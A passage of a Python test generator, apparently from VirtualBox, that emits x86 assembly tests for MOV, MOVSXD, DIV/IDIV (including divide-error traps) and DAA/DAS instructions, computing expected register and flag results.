self.writeInstrGregSibBaseAndScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1, iBaseReg, iIndexReg);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (sChecker,));
_ = cbMaxOp;
return True;
def generateStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, auInputs):
""" Generate all SIB variations for the given iOp1 (reg) value. """
assert cAddrBits in [32, 64];
i = oGen.cSibBasePerRun;
while i > 0:
oGen.iSibBaseReg = (oGen.iSibBaseReg + 1) % oGen.oTarget.getGRegCount(cAddrBits / 8);
if oGen.iSibBaseReg == X86_GREG_xSP: # no RSP testing atm.
continue;
j = oGen.getSibIndexPerRun();
while j > 0:
oGen.iSibIndexReg = (oGen.iSibIndexReg + 1) % oGen.oTarget.getGRegCount(cAddrBits / 8);
if oGen.iSibIndexReg == iOp1 and oGen.iSibIndexReg != 4 and cAddrBits != cbMaxOp:
continue; # Don't know the high bit of the address ending up the result - skip it for now.
for iMod in [0, 1, 2]:
if oGen.iSibBaseReg == iOp1 \
and ((oGen.iSibBaseReg != 5 and oGen.iSibBaseReg != 13) or iMod != 0) \
and cAddrBits != cbMaxOp:
continue; # Don't know the high bit of the address ending up the result - skip it for now.
for _ in oGen.oSibScaleRange:
oGen.iSibScale *= 2;
if oGen.iSibScale > 8:
oGen.iSibScale = 1;
for uInput in auInputs:
oGen.newSubTest();
uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[iOp1], oGen);
self.generateOneStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod,
oGen.iSibBaseReg, oGen.iSibIndexReg, oGen.iSibScale,
uInput, uResult);
j -= 1;
i -= 1;
return True;
def generateStandardTests(self, oGen):
""" Generate standard tests. """
# Parameters.
cbDefOp = oGen.oTarget.getDefOpBytes();
cbMaxOp = oGen.oTarget.getMaxOpBytes();
auShortInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen);
auLongInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen, fLong = True);
iLongOp1 = oGen.oTarget.randGRegNoSp();
iLongOp2 = oGen.oTarget.randGRegNoSp();
# Register tests
if self.fTestRegForm:
for cbEffOp in self.acbOpVars:
if cbEffOp > cbMaxOp:
continue;
oOp2Range = range(oGen.oTarget.getGRegCount(cbEffOp));
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
oOp2Range = [iLongOp2,];
oGen.write('; cbEffOp=%u\n' % (cbEffOp,));
for iOp1 in range(oGen.oTarget.getGRegCount(cbEffOp)):
if iOp1 == X86_GREG_xSP:
continue; # Cannot test xSP atm.
for iOp2 in oOp2Range:
if (iOp2 >= 16 and iOp1 in range(4, 16)) \
or (iOp1 >= 16 and iOp2 in range(4, 16)):
continue; # Any REX encoding turns AH,CH,DH,BH regs into SPL,BPL,SIL,DIL.
if iOp2 == X86_GREG_xSP:
continue; # Cannot test xSP atm.
oGen.write('; iOp2=%u cbEffOp=%u\n' % (iOp2, cbEffOp));
for uInput in (auLongInputs if iOp1 == iLongOp1 and iOp2 == iLongOp2 else auShortInputs):
oGen.newSubTest();
if not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) and not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
uCur = oGen.auRegValues[iOp1 & 15] if iOp1 != iOp2 else uInput;
uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen);
self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1 & 15, iOp2, iOp2 & 15,
uInput, uResult);
else:
self.generateOneStdTestGregGreg8BitHighPain(oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput);
# Memory test.
if self.fTestMemForm:
for cAddrBits in oGen.oTarget.getAddrModes():
for cbEffOp in self.acbOpVars:
if cbEffOp > cbMaxOp:
continue;
for _ in oGen.getModRegRange(cbEffOp):
oGen.iModReg = (oGen.iModReg + 1) % oGen.oTarget.getGRegCount(cbEffOp);
if oGen.iModReg == X86_GREG_xSP:
continue; # Cannot test xSP atm.
if oGen.iModReg > 15:
continue; ## TODO AH,CH,DH,BH
auInputs = auLongInputs if oGen.iModReg == iLongOp1 else auShortInputs;
for _ in oGen.oModRmRange:
oGen.iModRm = (oGen.iModRm + 1) % oGen.oTarget.getGRegCount(cAddrBits * 8);
if oGen.iModRm != 4 or cAddrBits == 16:
for uInput in auInputs:
oGen.newSubTest();
if oGen.iModReg == oGen.iModRm and oGen.iModRm != 5 \
and oGen.iModRm != 13 and cbEffOp != cbMaxOp:
continue; # Don't know the high bit of the address ending up the result - skip it for now.
uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[oGen.iModReg & 15], oGen);
self.generateOneStdTestGregMemNoSib(oGen, cAddrBits, cbEffOp, cbMaxOp,
oGen.iModReg, oGen.iModRm, uInput, uResult);
else:
# SIB - currently only short list of inputs or things may get seriously out of hand.
self.generateStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, auShortInputs);
return True;
def generateTest(self, oGen, sTestFnName):
oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
self.generateStandardTests(oGen);
oGen.write(' ret\n');
oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
return True;
class InstrTest_Mov_Gv_Ev(InstrTest_MemOrGreg_2_Greg):
"""
Tests MOV Gv,Ev.
"""
def __init__(self):
InstrTest_MemOrGreg_2_Greg.__init__(self, 'mov Gv,Ev', self.calc_mov);
@staticmethod
def calc_mov(cbEffOp, uInput, uCur, oGen):
""" Calculates the result of a mov instruction."""
if cbEffOp == 8:
return uInput & UINT64_MAX;
if cbEffOp == 4:
return uInput & UINT32_MAX;
if cbEffOp == 2:
return (uCur & 0xffffffffffff0000) | (uInput & UINT16_MAX);
assert cbEffOp == 1; _ = oGen;
return (uCur & 0xffffffffffffff00) | (uInput & UINT8_MAX);
class InstrTest_MovSxD_Gv_Ev(InstrTest_MemOrGreg_2_Greg):
"""
Tests MOVSXD Gv,Ev.
"""
def __init__(self):
InstrTest_MemOrGreg_2_Greg.__init__(self, 'movsxd Gv,Ev', self.calc_movsxd, acbOpVars = [ 8, 4, 2, ]);
self.fTestMemForm = False; # drop this...
def writeInstrGregGreg(self, cbEffOp, iOp1, iOp2, oGen):
""" Writes the instruction with two general registers as operands. """
if cbEffOp == 8:
oGen.write(' movsxd %s, %s\n'
% ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp / 2),));
else:
oGen.write(' oddmovsxd %s, %s\n'
% ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp),));
return True;
def isApplicable(self, oGen):
return oGen.oTarget.is64Bit();
@staticmethod
def calc_movsxd(cbEffOp, uInput, uCur, oGen):
"""
Calculates the result of a movxsd instruction.
Returns the result value (cbMaxOp sized).
"""
_ = oGen;
if cbEffOp == 8 and (uInput & RT_BIT_32(31)):
return (UINT32_MAX << 32) | (uInput & UINT32_MAX);
if cbEffOp == 2:
return (uCur & 0xffffffffffff0000) | (uInput & 0xffff);
return uInput & UINT32_MAX;
class InstrTest_DivIDiv(InstrTestBase):
"""
Tests IDIV and DIV instructions.
"""
def __init__(self, fIsIDiv):
if not fIsIDiv:
InstrTestBase.__init__(self, 'div Gv,Ev', 'div');
else:
InstrTestBase.__init__(self, 'idiv Gv,Ev', 'idiv');
self.fIsIDiv = fIsIDiv;
def generateInputEdgeCases(self, cbEffOp, fLong, fXcpt):
""" Generate edge case inputs for cbEffOp. Returns a list of pairs, dividen + divisor. """
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
# edge tests
auRet = [];
uDivisor = 1 if fLong else 3;
uDividend = uStep * uDivisor - 1;
for i in range(5 if fLong else 3):
auRet.append([uDividend + fXcpt, uDivisor]);
if self.fIsIDiv:
auRet.append([-uDividend - fXcpt, -uDivisor]);
auRet.append([-(uDividend + uDivisor + fXcpt), uDivisor]);
auRet.append([ (uDividend + uDivisor + fXcpt), -uDivisor]);
if i <= 3 and fLong:
auRet.append([uDividend - 1 + fXcpt*3, uDivisor]);
if self.fIsIDiv:
auRet.append([-(uDividend - 1 + fXcpt*3), -uDivisor]);
uDivisor += 1;
uDividend += uStep;
uDivisor = uStep - 1;
uDividend = uStep * uDivisor - 1;
for _ in range(3 if fLong else 1):
auRet.append([uDividend + fXcpt, uDivisor]);
if self.fIsIDiv:
auRet.append([-uDividend - fXcpt, -uDivisor]);
uDivisor -= 1;
uDividend -= uStep;
if self.fIsIDiv:
uDivisor = -uStep;
for _ in range(3 if fLong else 1):
auRet.append([uDivisor * (-uStep - 1) - (not fXcpt), uDivisor]);
uDivisor += 1
uDivisor = uStep - 1;
for _ in range(3 if fLong else 1):
auRet.append([-(uDivisor * (uStep + 1) - (not fXcpt)), uDivisor]);
uDivisor -= 1
return auRet;
def generateInputsNoXcpt(self, cbEffOp, fLong = False):
""" Generate inputs for cbEffOp. Returns a list of pairs, dividen + divisor. """
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
# edge tests
auRet = self.generateInputEdgeCases(cbEffOp, fLong, False)
# random tests.
if self.fIsIDiv:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randSxx(cbEffOp * 8);
if uDivisor == 0 or uDivisor >= uStep or uDivisor < -uStep:
continue;
uDividend = randSxx(cbEffOp * 16);
uResult = uDividend / uDivisor;
if uResult >= uStep or uResult <= -uStep: # exclude difficulties
continue;
break;
auRet.append([uDividend, uDivisor]);
else:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randUxx(cbEffOp * 8);
if uDivisor == 0 or uDivisor >= uStep:
continue;
uDividend = randUxx(cbEffOp * 16);
uResult = uDividend / uDivisor;
if uResult >= uStep:
continue;
break;
auRet.append([uDividend, uDivisor]);
return auRet;
def generateOneStdTestGreg(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV rDX:rAX,<GREG>' test. """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fEffOp = ((1 << (cbEffOp *8) ) - 1);
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
fTopOp = fMaxOp - fEffOp;
fFullOp1 = ((1 << (cbEffOp*16)) - 1);
uAX = iDividend & fFullOp1; # full with unsigned
uDX = uAX >> (cbEffOp*8);
uAX &= fEffOp;
uOp2Val = iDivisor & fEffOp;
iQuotient = iDividend / iDivisor;
iReminder = iDividend % iDivisor;
if iReminder != 0 and iQuotient < 0: # python has different rounding rules for negative division.
iQuotient += 1;
iReminder -= iDivisor;
uAXResult = iQuotient & fEffOp;
uDXResult = iReminder & fEffOp;
if cbEffOp < cbMaxOp:
uAX |= randUxx(cbMaxOp * 8) & fTopOp;
uDX |= randUxx(cbMaxOp * 8) & fTopOp;
uOp2Val |= randUxx(cbMaxOp * 8) & fTopOp;
if cbEffOp < 4:
uAXResult |= uAX & fTopOp;
uDXResult |= uDX & fTopOp;
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
' ; iQuotient=%#x (%d) iReminder=%#x (%d)\n'
% ( iDividend & fFullOp1, iDividend, iDivisor & fEffOp, iDivisor,
iQuotient & fEffOp, iQuotient, iReminder & fEffOp, iReminder, ));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX], uDX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
oGen.pushConst(uDXResult);
oGen.pushConst(uAXResult);
oGen.write(' %-4s %s\n' % (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, X86_GREG_xDX, iOp2),));
return True;
def generateOneStdTestGreg8Bit(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV AX,<GREG>' test (8-bit). """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
iOp2X = (iOp2 & 3) if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2) else iOp2;
assert iOp2X != X86_GREG_xAX;
uAX = iDividend & UINT16_MAX; # full with unsigned
uOp2Val = iDivisor & UINT8_MAX;
iQuotient = iDividend / iDivisor;
iReminder = iDividend % iDivisor;
if iReminder != 0 and iQuotient < 0: # python has different rounding rules for negative division.
iQuotient += 1;
iReminder -= iDivisor;
uAXResult = (iQuotient & UINT8_MAX) | ((iReminder & UINT8_MAX) << 8);
uAX |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT16_MAX);
uAXResult |= uAX & (fMaxOp - UINT16_MAX);
uOp2Val |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT8_MAX);
if iOp2X != iOp2:
uOp2Val = rotateLeftUxx(cbMaxOp * 8, uOp2Val, 8);
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
' ; iQuotient=%#x (%d) iReminder=%#x (%d)\n'
% ( iDividend & UINT16_MAX, iDividend, iDivisor & UINT8_MAX, iDivisor,
iQuotient & UINT8_MAX, iQuotient, iReminder & UINT8_MAX, iReminder, ));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
oGen.pushConst(uAXResult);
oGen.write(' %-4s %s\n' % (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, iOp2X),));
return;
def generateStandardTests(self, oGen):
""" Generates test that causes no exceptions. """
# Parameters.
iLongOp2 = oGen.oTarget.randGRegNoSp();
# Register tests
if True:
for cbEffOp in ( 8, 4, 2, 1 ):
if cbEffOp > oGen.oTarget.getMaxOpBytes():
continue;
oGen.write('; cbEffOp=%u\n' % (cbEffOp,));
oOp2Range = range(oGen.oTarget.getGRegCount(cbEffOp));
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
oOp2Range = [iLongOp2,];
for iOp2 in oOp2Range:
if iOp2 == X86_GREG_xSP:
continue; # Cannot test xSP atm.
if iOp2 == X86_GREG_xAX or (cbEffOp > 1 and iOp2 == X86_GREG_xDX):
continue; # Will overflow or be too complicated to get right.
if cbEffOp == 1 and iOp2 == (16 if oGen.oTarget.is64Bit() else 4):
continue; # Avoid dividing by AH, same reasons as above.
for iDividend, iDivisor in self.generateInputsNoXcpt(cbEffOp, iOp2 == iLongOp2):
oGen.newSubTest();
if cbEffOp > 1:
self.generateOneStdTestGreg(oGen, cbEffOp, iOp2, iDividend, iDivisor);
else:
self.generateOneStdTestGreg8Bit(oGen, cbEffOp, iOp2, iDividend, iDivisor);
## Memory test.
#if False:
# for cAddrBits in oGen.oTarget.getAddrModes():
# for cbEffOp in self.acbOpVars:
# if cbEffOp > cbMaxOp:
# continue;
#
# auInputs = auLongInputs if oGen.iModReg == iLongOp1 else auShortInputs;
# for _ in oGen.oModRmRange:
# oGen.iModRm = (oGen.iModRm + 1) % oGen.oTarget.getGRegCount(cAddrBits * 8);
# if oGen.iModRm != 4 or cAddrBits == 16:
# for uInput in auInputs:
# oGen.newSubTest();
# if oGen.iModReg == oGen.iModRm and oGen.iModRm != 5 and oGen.iModRm != 13 and cbEffOp != cbMaxOp:
# continue; # Don't know the high bit of the address ending up the result - skip it for now.
# uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[oGen.iModReg & 15], oGen);
# self.generateOneStdTestGregMemNoSib(oGen, cAddrBits, cbEffOp, cbMaxOp,
# oGen.iModReg, oGen.iModRm, uInput, uResult);
# else:
# # SIB - currently only short list of inputs or things may get seriously out of hand.
# self.generateStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, auShortInputs);
#
return True;
def generateInputsXcpt(self, cbEffOp, fLong = False):
"""
Generate inputs for cbEffOp that will overflow or underflow.
Returns a list of pairs, dividen + divisor.
"""
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
# edge tests
auRet = self.generateInputEdgeCases(cbEffOp, fLong, True);
auRet.extend([[0, 0], [1, 0], [ uStep * uStep / 2 - 1, 0]]);
# random tests.
if self.fIsIDiv:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randSxx(cbEffOp * 8);
uDividend = randSxx(cbEffOp * 16);
if uDivisor >= uStep or uDivisor < -uStep:
continue;
if uDivisor != 0:
uResult = uDividend / uDivisor;
if (uResult <= uStep and uResult >= 0) or (uResult >= -uStep and uResult < 0):
continue; # exclude difficulties
break;
auRet.append([uDividend, uDivisor]);
else:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randUxx(cbEffOp * 8);
uDividend = randUxx(cbEffOp * 16);
if uDivisor >= uStep:
continue;
if uDivisor != 0:
uResult = uDividend / uDivisor;
if uResult < uStep:
continue;
break;
auRet.append([uDividend, uDivisor]);
return auRet;
def generateOneDivideErrorTestGreg(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV rDX:rAX,<GREG>' test that causes #DE. """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fEffOp = ((1 << (cbEffOp *8) ) - 1);
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
fTopOp = fMaxOp - fEffOp;
fFullOp1 = ((1 << (cbEffOp*16)) - 1);
uAX = iDividend & fFullOp1; # full with unsigned
uDX = uAX >> (cbEffOp*8);
uAX &= fEffOp;
uOp2Val = iDivisor & fEffOp;
if cbEffOp < cbMaxOp:
uAX |= randUxx(cbMaxOp * 8) & fTopOp;
uDX |= randUxx(cbMaxOp * 8) & fTopOp;
uOp2Val |= randUxx(cbMaxOp * 8) & fTopOp;
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
% ( iDividend & fFullOp1, iDividend, iDivisor & fEffOp, iDivisor,));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX], uDX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX],));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX],));
oGen.write(' VBINSTST_TRAP_INSTR X86_XCPT_DE, 0, %-4s %s\n'
% (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, X86_GREG_xDX, iOp2),));
return True;
def generateOneDivideErrorTestGreg8Bit(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV AX,<GREG>' test that causes #DE (8-bit). """
if not oGen.oTarget.is64Bit() and iOp2 == 4: # Avoid AH.
iOp2 = 5;
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
iOp2X = (iOp2 & 3) if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2) else iOp2;
assert iOp2X != X86_GREG_xAX;
uAX = iDividend & UINT16_MAX; # full with unsigned
uOp2Val = iDivisor & UINT8_MAX;
uAX |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT16_MAX);
uOp2Val |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT8_MAX);
if iOp2X != iOp2:
uOp2Val = rotateLeftUxx(cbMaxOp * 8, uOp2Val, 8);
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
% ( iDividend & UINT16_MAX, iDividend, iDivisor & UINT8_MAX, iDivisor,));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
oGen.write(' push sAX\n');
oGen.write(' VBINSTST_TRAP_INSTR X86_XCPT_DE, 0, %-4s %s\n'
% (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, iOp2X),));
return;
def generateDivideErrorTests(self, oGen):
""" Generate divide error tests (raises X86_XCPT_DE). """
oGen.write('%ifdef VBINSTST_CAN_DO_TRAPS\n');
# We do one register variation here, assuming the standard test has got them covered.
# Register tests
if True:
iOp2 = oGen.oTarget.randGRegNoSp();
while iOp2 == X86_GREG_xAX or iOp2 == X86_GREG_xDX:
iOp2 = oGen.oTarget.randGRegNoSp();
for cbEffOp in ( 8, 4, 2, 1 ):
if cbEffOp > oGen.oTarget.getMaxOpBytes():
continue;
oGen.write('; cbEffOp=%u iOp2=%u\n' % (cbEffOp, iOp2,));
for iDividend, iDivisor in self.generateInputsXcpt(cbEffOp, fLong = not oGen.isTiny()):
oGen.newSubTest();
if cbEffOp > 1:
self.generateOneDivideErrorTestGreg(oGen, cbEffOp, iOp2, iDividend, iDivisor);
else:
self.generateOneDivideErrorTestGreg8Bit(oGen, cbEffOp, iOp2, iDividend, iDivisor);
oGen.write('%endif ; VBINSTST_CAN_DO_TRAPS\n');
return True;
def generateTest(self, oGen, sTestFnName):
oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
#oGen.write(' int3\n');
self.generateStandardTests(oGen);
self.generateDivideErrorTests(oGen);
#oGen.write(' int3\n');
oGen.write(' ret\n');
oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
return True;
class InstrTest_DaaDas(InstrTestBase):
""" Tests the DAA and DAS instructions. """
def __init__(self, fIsDas):
InstrTestBase.__init__(self, 'das' if fIsDas else 'daa');
self.fIsDas = fIsDas;
def isApplicable(self, oGen):
return not oGen.oTarget.is64Bit();
def generateTest(self, oGen, sTestFnName):
if self.fIsDas: from itgTableDas import g_aItgDasResults as aItgResults;
else: from itgTableDaa import g_aItgDaaResults as aItgResults;
cMax = len(aItgResults);
if oGen.isTiny():
cMax = 64;
oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
oGen.write(' xor ebx, ebx\n');
oGen.write('.das_loop:\n');
# Save the loop variable so we can load known values.
oGen.write(' push ebx\n');
oGen.newSubTestEx('ebx');
# Push the results.
oGen.write(' movzx eax, byte [.abAlResults + ebx]\n');
oGen.write(' or eax, %#x\n' % (oGen.au32Regs[X86_GREG_xAX] & ~0xff,));
oGen.write(' push eax\n');
oGen.write(' movzx eax, byte [.aFlagsResults + ebx]\n');
oGen.write(' push eax\n');
# Calc and push the inputs.
oGen.write(' mov eax, ebx\n');
oGen.write(' shr eax, 2\n');
oGen.write(' and eax, 0ffh\n');
oGen.write(' or eax, %#x\n' % (oGen.au32Regs[X86_GREG_xAX] & ~0xff,));
oGen.write(' push eax\n');
oGen.write(' pushfd\n')
oGen.write(' and dword [xSP], ~(X86_EFL_CF | X86_EFL_AF)\n');
oGen.write(' mov al, bl\n');
oGen.write(' and al, 2\n');
oGen.write(' shl al, X86_EFL_AF_BIT - 1\n');
oGen.write(' or [xSP], al\n');
oGen.write(' mov al, bl\n');
oGen.write(' and al, X86_EFL_CF\n');
oGen.write(' or [xSP], al\n');
# Load register values and do the test.
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' popfd\n');
oGen.write(' pop eax\n');
if self.fIsDas:
oGen.write(' das\n');
else:
oGen.write(' daa\n');
# Verify the results.
fFlagsToCheck = X86_EFL_CF | X86_EFL_PF | X86_EFL_AF | X86_EFL_SF | X86_EFL_ZF;
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needFlagsGRegChecker(fFlagsToCheck, X86_GREG_xAX),));
# Restore the loop variable and advance.
oGen.write(' pop ebx\n');
oGen.write(' inc ebx\n');
oGen.write(' cmp ebx, %#x\n' % (cMax,));
oGen.write(' jb .das_loop\n');
oGen.write(' ret\n');
oGen.write('.abAlResults:\n');
for i in range(cMax):
oGen.write(' db %#x\n' % (aItgResults[i][0],));
oGen.write('.aFlagsResults:\n');
for i in range(cMax):
oGen.write(' db %#x\n' % (aItgResults[i][1],));
oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
return True;
##
# Instruction Tests.
#
g_aoInstructionTests = [
InstrTest_Mov_Gv_Ev(),
InstrTest_MovSxD_Gv_Ev(),
InstrTest_DivIDiv(fIsIDiv = False),
InstrTest_DivIDiv(fIsIDiv = True),
InstrTest_DaaDas(fIsDas = False),
InstrTest_DaaDas(fIsDas = True),
];
class InstructionTestGen(object): # pylint: disable=R0902
"""
Instruction Test Generator.
"""
## @name Test size
## @{
ksTestSize_Large = 'large';
ksTestSize_Medium = 'medium';
ksTestSize_Tiny = 'tiny';
## @}
kasTestSizes = ( ksTestSize_Large, ksTestSize_Medium, ksTestSize_Tiny );
## The prefix for the checker functions.
ksCheckerPrefix = 'Common_Check_'
def __init__(self, oOptions):
self.oOptions = oOptions;
self.oTarget = g_dTargetEnvs[oOptions.sTargetEnv];
# Calculate the number of output files.
self.cFiles = 1;
if len(g_aoInstructionTests) > self.oOptions.cInstrPerFile:
self.cFiles = len(g_aoInstructionTests) / self.oOptions.cInstrPerFile;
if self.cFiles * self.oOptions.cInstrPerFile < len(g_aoInstructionTests):
self.cFiles += 1;
# Fix the known register values.
self.au64Regs = randUxxList(64, 16);
self.au32Regs = [(self.au64Regs[i] & UINT32_MAX) for i in range(8)];
self.au16Regs = [(self.au64Regs[i] & UINT16_MAX) for i in range(8)];
self.auRegValues = self.au64Regs if self.oTarget.is64Bit() else self.au32Regs;
# Declare state variables used while generating.
self.oFile = sys.stderr;
self.iFile = -1;
self.sFile = '';
self._dCheckFns = dict();
self._dMemSetupFns = dict();
self._d64BitConsts = dict();
# State variables used while generating test convenientely placed here (lazy bird)...
self.iModReg = 0;
self.iModRm = 0;
self.iSibBaseReg = 0;
self.iSibIndexReg = 0;
self.iSibScale = 1;
if self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
self._oModRegRange = range(2);
self._oModRegRange8 = range(2);
self.oModRmRange = range(2);
self.cSibBasePerRun = 1;
self._cSibIndexPerRun = 2;
self.oSibScaleRange = range(1);
elif self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
self._oModRegRange = range( 5 if self.oTarget.is64Bit() else 4);
self._oModRegRange8 = range( 6 if self.oTarget.is64Bit() else 4);
self.oModRmRange = range(5);
self.cSibBasePerRun = 5;
self._cSibIndexPerRun = 4
self.oSibScaleRange = range(2);
else:
self._oModRegRange = range(16 if self.oTarget.is64Bit() else 8);
self._oModRegRange8 = range(20 if self.oTarget.is64Bit() else 8);
self.oModRmRange = range(16 if self.oTarget.is64Bit() else 8);
self.cSibBasePerRun = 8;
self._cSibIndexPerRun = 9;
self.oSibScaleRange = range(4);
self.iSibIndexRange = 0;
#
# Methods used by instruction tests.
#
def write(self, sText):
""" Writes to the current output file. """
return self.oFile.write(unicode(sText));
def writeln(self, sText):
""" Writes a line to the current output file. """
self.write(sText);
return self.write('\n');
def writeInstrBytes(self, abInstr):
"""
Emits an instruction given as a sequence of bytes values.
"""
self.write(' db %#04x' % (abInstr[0],));
for i in range(1, len(abInstr)):
self.write(', %#04x' % (abInstr[i],));
return self.write('\n');
def newSubTest(self):
"""
Indicates that a new subtest has started.
"""
self.write(' mov dword [VBINSTST_NAME(g_uVBInsTstSubTestIndicator) xWrtRIP], __LINE__\n');
return True;
def newSubTestEx(self, sIndicator):
"""
Indicates that a new subtest has started.
"""
self.write(' mov dword [VBINSTST_NAME(g_uVBInsTstSubTestIndicator) xWrtRIP], %s\n' % (sIndicator, ));
return True;
def needGRegChecker(self, iReg1, iReg2 = None, iReg3 = None):
"""
Records the need for a given register checker function, returning its label.
"""
if iReg2 is not None:
if iReg3 is not None:
sName = '%s_%s_%s' % (self.oTarget.asGRegs[iReg1], self.oTarget.asGRegs[iReg2], self.oTarget.asGRegs[iReg3],);
else:
sName = '%s_%s' % (self.oTarget.asGRegs[iReg1], self.oTarget.asGRegs[iReg2],);
else:
sName = '%s' % (self.oTarget.asGRegs[iReg1],);
assert iReg3 is None;
if sName in self._dCheckFns:
self._dCheckFns[sName] += 1;
else:
self._dCheckFns[sName] = 1;
return self.ksCheckerPrefix + sName;
def needFlagsGRegChecker(self, fFlagsToCheck, iReg1, iReg2 = None, iReg3 = None):
"""
Records the need for a given rFLAGS + register checker function, returning its label.
"""
